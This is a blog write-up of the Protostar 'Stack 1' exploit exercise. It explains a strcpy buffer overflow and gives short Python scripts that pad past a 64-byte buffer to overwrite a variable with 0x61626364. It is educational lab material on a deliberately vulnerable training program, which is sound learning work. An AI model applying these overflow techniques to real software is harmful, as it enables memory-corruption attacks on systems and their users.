[ExpDev] Exploit Exercise | Protostar | Stack 1

Stack 1

The goal of this challenge is to overflow a buffer to modify the “modified” variable value to “0x61626364” and print the winning statement.

  • modified = 0: So the “modified” variable is hardcoded to 0.
  • strcpy(buffer, argv[1]);: This is the vulnerable func of this program. It will copy the user supplied strings to a pointer; however, if the strings are bigger than the set buffer which is 64 bytes in this case (char buffer[64];), the BOF will happen.

Initial Recon

When we enter a random string like “bigb0ss,” we get the following output = 0x00000000:

So, what is going on? Let’s look at the source code once again. Basically, what it does is it checks if the “modified” value is “0x61626364” and if not it just prints out the current value of the “modified” variable, which is obviously 0.

But since we know that the buffer limit is 64 bytes, when we supply 70 “A”s, we get the following output:

So “0x41” is a capital “A” in the ASCII representation. By supplying more bytes than the buffer size, we can see that the “modified” value is overwritten. Next task is simple: (1) find the offset; (2) offset + overwrite “modified” value with “0x61626364.”

Exploit

Let’s create the following exploit with python:

[Exploit-1]#!/usr/bin/pythonpadding = "A" * 60                       # Giving 60 padding              
padding+= "BBBBCCCCDDDDEEEEFFFF" # Using different letters

print padding

When we run this against the stack1 program, we now see the “modified” value is overwritten with “0x43434343” (“0x43 = C).

Now we know that by switching “CCCC” with our target value (“0x61626364”), we can print out the winning statement. Before that let’s convert those hex value to the ASCII characters. We can do this with python.

[Exploit-2]#!/usr/bin/pythonpadding = "A" * 64                # Offset (60 + BBBB)
padding+= "dcba" # Replacing "CCCC" with "dcba"
# (Little-endian format)

print padding

When it’s run, we get the winning statement!

Thanks for reading!

  • Stack 2 — Stack-based BOF: Basic 2

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store